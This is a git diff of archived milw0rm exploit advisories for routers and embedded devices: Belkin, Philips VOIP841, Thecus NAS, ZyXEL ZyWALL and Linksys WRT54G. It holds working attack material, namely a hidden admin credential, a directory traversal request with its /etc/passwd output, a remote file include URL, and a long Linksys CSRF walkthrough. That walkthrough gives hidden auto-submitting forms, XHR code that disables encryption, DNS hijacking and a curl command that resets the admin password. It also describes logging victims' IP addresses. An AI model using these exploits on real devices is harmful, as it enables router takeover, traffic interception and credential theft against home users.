+ die("Socket problems\n");
+ if(connect(S,pack "SnA4x8",2,$port,$target)){
+ my @in;
+ select(S); $|=1; print $pstr;
+ while(){ push @in, $_;}
+ select(STDOUT); close(S); return @in;
+ } else { die("Can't connect check the port or address...\n"); }
+}
+
+# milw0rm.com [2007-12-27]
diff --git a/platforms/hardware/remote/4941.txt b/platforms/hardware/remote/4941.txt
index 438a6627d..60e543dfa 100755
--- a/platforms/hardware/remote/4941.txt
+++ b/platforms/hardware/remote/4941.txt
@@ -1,67 +1,67 @@
-##
-## VULNERABILITY:
-##
-## Belkin Wireless G Plus MIMO Router F5D9230-4
-## Authentication Bypass Vulnerability
-##
-##
-## AUTHOR:
-##
-## DarkFig < gmdarkfig (at) gmail (dot) com >
-## http://acid-root.new.fr/?0:17
-## #acidroot@irc.worldnet.net
-##
-##
-## INTRODUCTION:
-##
-## I recently bought this router for my local
-## network (without modem integrated), now I can tell
-## that it was a bad choice. When my ISP disconnects
-## me from internet, in the most case I have to reboot
-## my Modem and the Router in order to reconnect.
-## So I coded a program (which send http packets) to reboot
-## my router, it asks me the router password, and reboots it.
-## One day I wrote a bad password, but it worked. So I
-## decided to make some tests in order to see if there was
-## a vulnerability.
-##
-##
-## DESCRIPTION:
-##
-## Apparently when the router starts, it creates a file
-## (without content) named user.conf, then when we go to
-## SaveCfgFile.cgi, the configuration is saved to the file
-## user.conf. But the problem is that we can access to the
-## file SaveCfgFile.cgi without login.
-##
-##
-## PROOF OF CONCEPT:
-##
-## For example we can get the configuration file here:
-## http:///SaveCfgFile.cgi
-##
-## pppoe_username=...
-## pppoe_password=...
-## wl0_pskkey=...
-## wl0_key1=...
-## mradius_password=...
-## mradius_secret=...
-## httpd_password=...
-## http_passwd=...
-## pppoe_passwd=...
-##
-##
-## Tested on the latest firmware for this product
-## (version 3.01.53).
-##
-##
-## PATCH:
-##
-## Actually (08-01-19) there is no firmware update, but I
-## contacted the author, if they'll release a patch, it
-## will be available here:
-## http://web.belkin.com/support/download/download.asp
-## ?download=F5D9230-4&lang=1&mode=
-##
-
-# milw0rm.com [2008-01-20]
+##
+## VULNERABILITY:
+##
+## Belkin Wireless G Plus MIMO Router F5D9230-4
+## Authentication Bypass Vulnerability
+##
+##
+## AUTHOR:
+##
+## DarkFig < gmdarkfig (at) gmail (dot) com >
+## http://acid-root.new.fr/?0:17
+## #acidroot@irc.worldnet.net
+##
+##
+## INTRODUCTION:
+##
+## I recently bought this router for my local
+## network (without modem integrated), now I can tell
+## that it was a bad choice. When my ISP disconnects
+## me from internet, in the most case I have to reboot
+## my Modem and the Router in order to reconnect.
+## So I coded a program (which send http packets) to reboot
+## my router, it asks me the router password, and reboots it.
+## One day I wrote a bad password, but it worked. So I
+## decided to make some tests in order to see if there was
+## a vulnerability.
+##
+##
+## DESCRIPTION:
+##
+## Apparently when the router starts, it creates a file
+## (without content) named user.conf, then when we go to
+## SaveCfgFile.cgi, the configuration is saved to the file
+## user.conf. But the problem is that we can access to the
+## file SaveCfgFile.cgi without login.
+##
+##
+## PROOF OF CONCEPT:
+##
+## For example we can get the configuration file here:
+## http:///SaveCfgFile.cgi
+##
+## pppoe_username=...
+## pppoe_password=...
+## wl0_pskkey=...
+## wl0_key1=...
+## mradius_password=...
+## mradius_secret=...
+## httpd_password=...
+## http_passwd=...
+## pppoe_passwd=...
+##
+##
+## Tested on the latest firmware for this product
+## (version 3.01.53).
+##
+##
+## PATCH:
+##
+## Actually (08-01-19) there is no firmware update, but I
+## contacted the author, if they'll release a patch, it
+## will be available here:
+## http://web.belkin.com/support/download/download.asp
+## ?download=F5D9230-4&lang=1&mode=
+##
+
+# milw0rm.com [2008-01-20]
diff --git a/platforms/hardware/remote/5113.txt b/platforms/hardware/remote/5113.txt
index fad3813a7..d2be2e656 100755
--- a/platforms/hardware/remote/5113.txt
+++ b/platforms/hardware/remote/5113.txt
@@ -1,41 +1,41 @@ -.:[ Philips VOIP841 Multiple Vulnerabilities ]:. -Luca "ikki" Carettoni - luca.carettoni@ikkisoft.com - -Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd) -Systems not affected: n/a - -(a) Hidden Administration Account (web management console) - -service:service - -(b) Directory Listing, Directory Traversal - -jungle ikki $ telnet 192.168.1.10 80 -Trying 192.168.1.10... -Connected to 192.168.1.10. -Escape character is '^]'. -GET /../../../../../../../../etc/passwd HTTP/1.0 -Host: 192.168.1.10 -Authorization: Basic c2VydmljZTpzZXJ2aWNl - -HTTP/1.0 200 OK -Content-type: text/plain -Expires: Sat, 24 May 1980.7:00:00.GMT -Pragma: no-cache -Server: simple httpd 1.0 - -root:x:0:0:root:/root:/bin/bash -demo:x:5000:100:Demo User:/home/demo:/bin/bash -nobody:x:65534:65534:Nobody:/htdocs:/bin/bash -Connection closed by foreign host. - -(c) Cross Site Scripting (XSS) inside the 404 standard response page - -GET /var/htdocs/ HTTP/1.0 - -(d) Insecure Storage (Skype credentials, web management console passwords, ...) - -/var/jffs2/data/save.dat -/tmp/apply.log - -# milw0rm.com [2008-02-14] +.:[ Philips VOIP841 Multiple Vulnerabilities ]:. +Luca "ikki" Carettoni - luca.carettoni@ikkisoft.com + +Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd) +Systems not affected: n/a + +(a) Hidden Administration Account (web management console) + +service:service + +(b) Directory Listing, Directory Traversal + +jungle ikki $ telnet 192.168.1.10 80 +Trying 192.168.1.10... +Connected to 192.168.1.10. +Escape character is '^]'. 
+GET /../../../../../../../../etc/passwd HTTP/1.0 +Host: 192.168.1.10 +Authorization: Basic c2VydmljZTpzZXJ2aWNl + +HTTP/1.0 200 OK +Content-type: text/plain +Expires: Sat, 24 May 1980.7:00:00.GMT +Pragma: no-cache +Server: simple httpd 1.0 + +root:x:0:0:root:/root:/bin/bash +demo:x:5000:100:Demo User:/home/demo:/bin/bash +nobody:x:65534:65534:Nobody:/htdocs:/bin/bash +Connection closed by foreign host. + +(c) Cross Site Scripting (XSS) inside the 404 standard response page + +GET /var/htdocs/ HTTP/1.0 + +(d) Insecure Storage (Skype credentials, web management console passwords, ...) + +/var/jffs2/data/save.dat +/tmp/apply.log + +# milw0rm.com [2008-02-14] diff --git a/platforms/hardware/remote/5150.txt b/platforms/hardware/remote/5150.txt index 7836aacac..d94f10394 100755 --- a/platforms/hardware/remote/5150.txt +++ b/platforms/hardware/remote/5150.txt @@ -1,48 +1,48 @@ -Thecus N5200Pro NAS Server Control Panel Remote File İnclude - - -Author : Crackers_Child - -Mail : cashr00t@hotmail.com - -Bug in : usrgetform.html - - - - - - -Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? - -İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 - -Greetz: Str0ke - -# milw0rm.com [2008-02-18] +Thecus N5200Pro NAS Server Control Panel Remote File İnclude + + +Author : Crackers_Child + +Mail : cashr00t@hotmail.com + +Bug in : usrgetform.html + + + + + + +Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? + +İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 + +Greetz: Str0ke + +# milw0rm.com [2008-02-18] diff --git a/platforms/hardware/remote/5289.txt b/platforms/hardware/remote/5289.txt index 6724d7f3e..31bdce82e 100755 --- a/platforms/hardware/remote/5289.txt +++ b/platforms/hardware/remote/5289.txt 
@@ -1,33 +1,33 @@ -Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability -Release Date: 10 March 2008 -Discover: Pranav Joshi -Vendor: ZyXEL -Products Affected: ZyWALL - -(Status on other affected products & firmwares pending from vendor’s end) - - CVE-2008-1160 - - BID 28184 - ---------------------------- - -Technical Details - ---------------------------- - -The vulnerability in the Quagga/Zebra routing daemon, exists due to the -fact that the appliance fails to change the password needed to login -into the Quagga/Zebra daemon running on ports 2601, 2602 (Quagga/RIP) & -2604 (Quagga/OSPF) /TCP, even though the password of the appliance has -been changed an attacker can still use the default password ‘zebra’ to -log into the Quagga/Zebra service to view and manipulate the routing -information etc. of the appliance. - -The vulnerability was discovered on ZyWall 1050 appliance other versions -could be affected as well. - -Information on other vulnerable products and firmwares is pending from -the vendor’s end. - -# milw0rm.com [2008-03-21] +Name: ZyXEL ZyWALL Quagga/Zebra Remote Root Vulnerability +Release Date: 10 March 2008 +Discover: Pranav Joshi +Vendor: ZyXEL +Products Affected: ZyWALL + +(Status on other affected products & firmwares pending from vendor’s end) + + CVE-2008-1160 + + BID 28184 + +--------------------------- + +Technical Details + +--------------------------- + +The vulnerability in the Quagga/Zebra routing daemon, exists due to the +fact that the appliance fails to change the password needed to login +into the Quagga/Zebra daemon running on ports 2601, 2602 (Quagga/RIP) & +2604 (Quagga/OSPF) /TCP, even though the password of the appliance has +been changed an attacker can still use the default password ‘zebra’ to +log into the Quagga/Zebra service to view and manipulate the routing +information etc. of the appliance. + +The vulnerability was discovered on ZyWall 1050 appliance other versions +could be affected as well. 
+ +Information on other vulnerable products and firmwares is pending from +the vendor’s end. + +# milw0rm.com [2008-03-21] diff --git a/platforms/hardware/remote/5926.txt b/platforms/hardware/remote/5926.txt index 5fc444aa0..e35f797f5 100755 --- a/platforms/hardware/remote/5926.txt +++ b/platforms/hardware/remote/5926.txt 
@@ -1,351 +1,351 @@ - __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ - | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ - | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y - | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | - | Y | | | | || || | | | | | || / | __ | | | | || _] | | - | . | j l | | |l || | j l | | || || T j l | | || T l ! - l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/ - - <>< | ><> Hacking the Linksys WRT54G #2 - <>< | ><> https://kinqpinz.info/ - <>< | ><> by meathive - <>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com - - -++| CVE-2008-1247 ----------------------- -The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials -when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via -a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, -(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, -(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, -(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. -NOTE: the Security.tri vector is already covered by CVE-2006-5202. - -++| Intro ----------------------- -This text is in addition to the findings I have already made public regarding the Linksys WRT54G -wireless router and firewall gateway device. The scripts that process configuration changes do not -require authentication and therefore can be altered _remotely_ via simple form submissions written -in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous -findings and the demo page with sample exploits. - -++| Let's Get Dirty ----------------------- -You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. 
It basically shows -how forms can be constructed in HTML that take advantage of the major flaws present within the -insecure router. In my previous documentation I showed how it is possible to alter configuration -parameters both via Linux command line using curl and HTML form submissions. In this text I -demonstrate how to do these very same things transparently using a combination of HTML form -construction with JavaScript that automagically submits our desired changes. - -The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will -redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO -AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all -that is required in order to submit our form that will be constructed using GET parameters observed -from the device's Web interface. - -document.f.submit(); - -This submits forms hidden within the Webpage. Our first example code enables wireless access with an -SSID of our choosing. In this instance, I will use the SSID "kinqpinz". - - - - - - - - - - - - - - -The reason this works is simple: configuration parameters are constructed in the URL in the Web -interface, hosted by default at the address http://192.168.1.1. One can view these parameters while -configuring their device. The code above simply constructs a URL that is processed by the router's -IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: - -http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en - -It's simple enough to understand what's going on. Each variable passed in the URL describes exactly -what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part -to exploiting the router is the fact that you cannot alter settings using a URL like the one above. 
-That would result in a GET request on behalf of the device, whereas we're interested in POST -requests that actually trigger configuration changes. A GET request does nothing. Below I describe -a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, -and a touch of PHP to grab the mark's external IP. - -++| Remote Real World Attack Scenario ----------------------- -So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It -has made a few assumptions about your environment, however. One major assumption is that you've -kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes -you've made to the router in terms of security, e.g., strong password, wireless encryption, access -restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do -NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so -that you do not fall victim to a malicious individual hosting code that will be presented in this -text. - -++| Remote Real World Attack Scenario Requirements ----------------------- -On http://www.hacker.tld a page is hosted that contains the following: - (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; - (2) JavaScript that submits these forms transparently; - (3) PHP or similar server-side code that acquires the mark's external IP address as they browse - the page; and, - (4) PHP or similar server-side code that retains the mark's external IP address in the event that - the remote form submission is successful, thus allowing the remote attacker to further exploit the - device. - -http://www.hacker.tld/index.php contains the following code for achieving its purpose. 
To begin, PHP -is used - though any server-side language is suitable - for obtaining the external IP of any -individual viewing the exploit page and writes this information to a log file. - - -The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute -and submitting the form. - - - -All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the -HTML form's 'hidden' attribute. - -
- - - - - - - - - - -
- -What you should observe from this is the form name of "f" which is used in the JS to submit the form -as well as the various 'name' and 'value' attributes that are used to create a URL such as this: - -submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en - -Do note that without any one of these parameters, the exploit fails and nothing changes. All of the -elements must remain in place even if they do not directly make sense. They are simply options that -the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case -matters and do not forget that the request must be POST, not GET. Also different config changes -require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. - -Now that the malicious page has been composed and sits online living and waiting for marks at -http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom -PHP logging script. In mark.txt, our logging file, sample output would resemble something like the -following. - -Potential mark resides at 1.1.1.1 - -Potential mark resides at 2.2.2.2 - -Potential mark resides at 3.3.3.3 - -So forth... - -They are potential marks because it is unknown whether or not they are using the WRT54G with a -supported firmware version that is exploitable using these techniques, and/or the exploit attempt -failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not -using the default local address (good for them) that this attack relies on. - -When they browse the page, because we have set no timeout for this change to occur, they are -instantly redirected to http://192.168.1.1/WBasic.tri. 
The URL, because it is not a GET request, -does not inform the user if they were educated enough of what has just happened, so they may -continue on doing whatever they were doing, more often than not unaware of what has just happened. -At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at -our leisure and further test the remote host whether or not they are vulnerable to attack. At the -very least, we may decide to completely reset the router to rest assured we know its current state -to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. -This is quite feasible, here's how. - -
- - - -
- -This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en - -Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs -all incoming and outgoing requests before passing them on to the next in line. - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- -This is indeed convoluted but all of these values must be in place in order to be successful. What -is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our -own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, -and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while -obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the -following URL that is submitted to http://192.168.1.1/Basic.tri. - -http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en - -++| An Alternative (with JavaScript) ----------------------- -This is the basic exploitation method of the router although the attacker has many alternatives of -submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. -A few alternative methods would include using a JavaScript onClick function within a standard -looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: - -This looks innocent enough. 
- -...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this -standard looking navigation link, e.g.: - -var xhr=false; -if(window.XMLHttpRequest) { - xhr=new XMLHttpRequest(); -} else if(window.ActiveXObject) { - xhr=new ActiveXObject("Microsoft.XMLHTTP"); -} -function xhrRequest() { - if(xhr) { - xhr.open("POST", "http://192.168.1.1/Security.tri", true); - xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); - xhr.onreadystatechange=function() { - if(xhr.readyState == 4 && xhr.status == 200) { - var success=xhr.responseText; - } - } - xhr.send("SecurityMode=0&layout=en"); - } -} - -The example above effectively disables all wireless encryption so that if you happen to live close -enough to this poor individual, it is your duty to pwn their wireless by enabling open access for -everybody in the neighborhood! Here's the URL for disabling wireless encryption: - -http://192.168.1.1/Security.tri?SecurityMode=0&layout=en - -++| An Alternative (without JavaScript) ----------------------- -You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + -NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent -looking methods of compromising your WRT54G. For example, user registration for a bulletin board or -forum system. The site must acquire a minimal amount of information in order to create the account -so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to -enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the -URL once again: - -http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en - -Again it is a different script processing the request on behalf of the router's internal operating -system, dmz.tri, but it still does not require authentication prior to changing the settings we wish -to change. 
All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.: - -
- - - - - -...and add these values to their user registration page with standard username/password/e-mail fields... - - Username:
- Password:
- Confirm Password:
- -
- -...that can be found on traditional forums these days. The mark submits and exploits his/her own -router although they believe they are at least minimally technically savvy by using a combination of -technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms -we use to store the router configs are hidden, and the normal user registration forms are not, thus -it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has -detected that a potential attack is taking place it is likely too late as the mastermind behind -http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up -targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration -changes within 10 seconds, which is plenty of time for them to open another terminal and change the -administrative login to block our mark from changing their settings, e.g.: - -curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri - -Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_ -monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords -via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the -router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more. - -++| Conclusion ----------------------- -It is my intention in finalizing this document that the reader understands that the Linksys WRT54G -firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care -whether or not you have the level of privilege thought to be necessary for manipulating sensitive -objects. - -Thanks go to hw2B for suggesting I write all of this garbage out. 
- -++| URLs ----------------------- -https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) -https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) -https://kinqpinz.info/lib/wrt54g/own2.txt (this document) -http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247) - -# milw0rm.com [2008-06-24] + __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___ + | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ + | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y + | \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O | + | Y | | | | || || | | | | | || / | __ | | | | || _] | | + | . | j l | | |l || | j l | | || || T j l | | || T l ! + l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/ + + <>< | ><> Hacking the Linksys WRT54G #2 + <>< | ><> https://kinqpinz.info/ + <>< | ><> by meathive + <>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com + + +++| CVE-2008-1247 +---------------------- +The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials +when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via +a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, +(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, +(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, +(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. +NOTE: the Security.tri vector is already covered by CVE-2006-5202. + +++| Intro +---------------------- +This text is in addition to the findings I have already made public regarding the Linksys WRT54G +wireless router and firewall gateway device. 
The scripts that process configuration changes do not +require authentication and therefore can be altered _remotely_ via simple form submissions written +in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous +findings and the demo page with sample exploits. + +++| Let's Get Dirty +---------------------- +You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows +how forms can be constructed in HTML that take advantage of the major flaws present within the +insecure router. In my previous documentation I showed how it is possible to alter configuration +parameters both via Linux command line using curl and HTML form submissions. In this text I +demonstrate how to do these very same things transparently using a combination of HTML form +construction with JavaScript that automagically submits our desired changes. + +The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will +redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO +AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all +that is required in order to submit our form that will be constructed using GET parameters observed +from the device's Web interface. + +document.f.submit(); + +This submits forms hidden within the Webpage. Our first example code enables wireless access with an +SSID of our choosing. In this instance, I will use the SSID "kinqpinz". + +
+ + + + + + + + + + +
+ +The reason this works is simple: configuration parameters are constructed in the URL in the Web +interface, hosted by default at the address http://192.168.1.1. One can view these parameters while +configuring their device. The code above simply constructs a URL that is processed by the router's +IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser: + +http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en + +It's simple enough to understand what's going on. Each variable passed in the URL describes exactly +what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part +to exploiting the router is the fact that you cannot alter settings using a URL like the one above. +That would result in a GET request on behalf of the device, whereas we're interested in POST +requests that actually trigger configuration changes. A GET request does nothing. Below I describe +a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, +and a touch of PHP to grab the mark's external IP. + +++| Remote Real World Attack Scenario +---------------------- +So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It +has made a few assumptions about your environment, however. One major assumption is that you've +kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes +you've made to the router in terms of security, e.g., strong password, wireless encryption, access +restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do +NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so +that you do not fall victim to a malicious individual hosting code that will be presented in this +text. 
+ +++| Remote Real World Attack Scenario Requirements +---------------------- +On http://www.hacker.tld a page is hosted that contains the following: + (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; + (2) JavaScript that submits these forms transparently; + (3) PHP or similar server-side code that acquires the mark's external IP address as they browse + the page; and, + (4) PHP or similar server-side code that retains the mark's external IP address in the event that + the remote form submission is successful, thus allowing the remote attacker to further exploit the + device. + +http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP +is used - though any server-side language is suitable - for obtaining the external IP of any +individual viewing the exploit page and writes this information to a log file. + + +The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute +and submitting the form. + + + +All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the +HTML form's 'hidden' attribute. + +
+ + + + + + + + + + +
+ +What you should observe from this is the form name of "f" which is used in the JS to submit the form +as well as the various 'name' and 'value' attributes that are used to create a URL such as this: + +submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en + +Do note that without any one of these parameters, the exploit fails and nothing changes. All of the +elements must remain in place even if they do not directly make sense. They are simply options that +the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case +matters and do not forget that the request must be POST, not GET. Also different config changes +require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. + +Now that the malicious page has been composed and sits online living and waiting for marks at +http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom +PHP logging script. In mark.txt, our logging file, sample output would resemble something like the +following. + +Potential mark resides at 1.1.1.1 + +Potential mark resides at 2.2.2.2 + +Potential mark resides at 3.3.3.3 + +So forth... + +They are potential marks because it is unknown whether or not they are using the WRT54G with a +supported firmware version that is exploitable using these techniques, and/or the exploit attempt +failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not +using the default local address (good for them) that this attack relies on. + +When they browse the page, because we have set no timeout for this change to occur, they are +instantly redirected to http://192.168.1.1/WBasic.tri. 
The URL, because it is not a GET request, +does not inform the user if they were educated enough of what has just happened, so they may +continue on doing whatever they were doing, more often than not unaware of what has just happened. +At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at +our leisure and further test the remote host whether or not they are vulnerable to attack. At the +very least, we may decide to completely reset the router to rest assured we know its current state +to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. +This is quite feasible, here's how. + +
+ + + +
+ +This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en + +Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs +all incoming and outgoing requests before passing them on to the next in line. + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +This is indeed convoluted but all of these values must be in place in order to be successful. What +is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our +own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, +and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while +obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the +following URL that is submitted to http://192.168.1.1/Basic.tri. + +http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en + +++| An Alternative (with JavaScript) +---------------------- +This is the basic exploitation method of the router although the attacker has many alternatives of +submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. +A few alternative methods would include using a JavaScript onClick function within a standard +looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.: + +This looks innocent enough. 
